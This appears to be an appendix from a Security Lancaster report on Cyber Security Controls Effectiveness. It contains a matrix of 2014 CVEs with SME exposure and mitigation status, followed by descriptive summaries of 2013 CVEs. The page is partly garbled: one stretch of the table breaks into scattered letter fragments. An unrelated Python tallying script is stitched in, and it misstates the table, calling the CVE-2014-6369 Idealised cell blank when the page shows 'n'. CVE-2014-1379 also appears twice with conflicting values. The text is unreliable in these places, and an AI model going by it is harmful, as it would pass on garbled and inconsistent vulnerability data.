CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigat
ed-

An

ti-M

alw

are

Pat

chM

anag

emen

tC

VE

-20

14

-86

38

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-8

83

5y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-9

15

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-A

nti

-Mal

war

eP

atch

Man

agem

ent

[Tim

eD

elay

]C

VE

-20

14

-91

63

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

t[T

ime

Del

ay]

CV

E-2

01

4-9

35

0y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lA

nti

-Do

sF

irm

war

eU

pd

ates

CV

E-2

01

4-9

35

7n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

An

ti-M

alw

are

Sec

ure

Co

nfi

gu

rati

on

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
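The mitigation matrix above can be tallied mechanically rather than by eye. The Python below is an added example, not code from the report: it parses the rows as transcribed from the table (pipe-separated, with the control list read from the With CE cell after the dash), normalises control names by dropping the parenthetical and bracketed qualifiers such as "(Secure Browser)" and "[Time Delay]", and reports how often each Cyber Essentials control carries a mitigation and how the tally looks when restricted to the CVEs that at least one surveyed SME was actually exposed to. Reading SME1 to SME4 and Idealised as y/n presence flags is an assumption taken from the column header; the blank Idealised cell for CVE-2014-6369 is blank on the page as well.

```python
"""Tally the Cyber Essentials (CE) mitigation matrix: which CE control
carries each mitigation, and how the picture changes when only CVEs that
were present in at least one surveyed SME are counted."""
from collections import Counter
from dataclasses import dataclass

# Rows transcribed from the report's table (CVE | SME1..SME4 | Idealised | No CE | With CE).
# Column meaning (y/n = product present) is an assumption taken from the header.
TABLE = """\
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y |  | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration
"""


@dataclass(frozen=True)
class Row:
    cve: str
    smes: tuple        # (SME1, SME2, SME3, SME4) as booleans
    idealised: bool
    no_ce: str
    with_ce: str       # "Mitigated" or "Partially Mitigated"
    controls: tuple    # CE controls credited in the With CE cell, qualifiers stripped


def base_control(name):
    """'Secure Configuration (Secure Browser)' -> 'Secure Configuration';
    'Patch Management [Time Delay]' -> 'Patch Management'."""
    for sep in (" (", " ["):
        name = name.split(sep, 1)[0]
    return name.strip()


def parse_row(line):
    cells = [c.strip() for c in line.split("|")]
    if len(cells) != 8:
        raise ValueError(f"expected 8 cells, got {len(cells)}: {line!r}")
    status, _, ctrl = cells[7].partition(" - ")
    controls = tuple(base_control(c) for c in ctrl.split(",") if c.strip())
    return Row(cells[0], tuple(c == "y" for c in cells[1:5]), cells[5] == "y",
               cells[6], status.strip(), controls)


def parse_table(text):
    return [parse_row(line) for line in text.splitlines() if line.strip()]


def summarise(rows):
    """Counts over the whole matrix and over the subset some SME was exposed to."""
    exposed = [r for r in rows if any(r.smes)]
    return {
        "total": len(rows),
        "no_ce_not_mitigated": sum(r.no_ce == "Not Mitigated" for r in rows),
        "with_ce": dict(Counter(r.with_ce for r in rows)),
        "controls": dict(Counter(c for r in rows for c in set(r.controls))),
        "exposed": len(exposed),
        "exposed_fully_mitigated": sum(r.with_ce == "Mitigated" for r in exposed),
    }


if __name__ == "__main__":
    summary = summarise(parse_table(TABLE))
    for key, value in summary.items():
        print(f"{key}: {value}")
```

Run as a script it prints the tallies; the "controls" entry counts a control once per CVE even where the table credits it twice, which is why the "(Secure Browser)" and "(Access Control)" variants fold into one Secure Configuration figure.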

CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.


CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

